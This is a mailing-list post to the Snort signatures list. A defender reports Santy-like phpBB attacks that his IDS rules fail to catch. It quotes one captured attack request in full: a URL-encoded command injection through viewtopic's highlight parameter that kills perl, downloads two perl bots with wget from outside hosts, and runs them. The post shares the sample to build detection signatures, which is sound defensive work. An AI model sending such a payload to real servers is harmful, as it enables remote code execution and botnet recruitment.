[Snort-sigs] Santy (sort of ) doesnt trigger any rule

Helo,

I got an increasing number of attacks looking like santy. But they never 
trigger any of the rules I use (official snort set 2.2 and bleeding 
snort set, updated every night).

There are seven different patterns (the most frequent is attached 
below). The attacks come from lots of différent ip, which seem to have a 
webserver running.
They try to use an existing webalizer html page (wich itself contains 
références to à viewtopic.php file). Off course, it fails.

I'm not sure if this could really hurt if used with a real php page, but 
I think so.

I can post a complete sample of these atacks if needed.

GET 
/webalizer/usage_200407.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.abcft.org/themes/bot.htm;wget%20http://http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

--
guy


-------------------------------------------------------
The SF.Net email is sponsored by: Beat the post-holiday blues
Get a FREE limited edition SourceForge.net t-shirt from ThinkGeek.
It's fun and FREE -- well, almost....http://www.thinkgeek.com/sfshirt
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs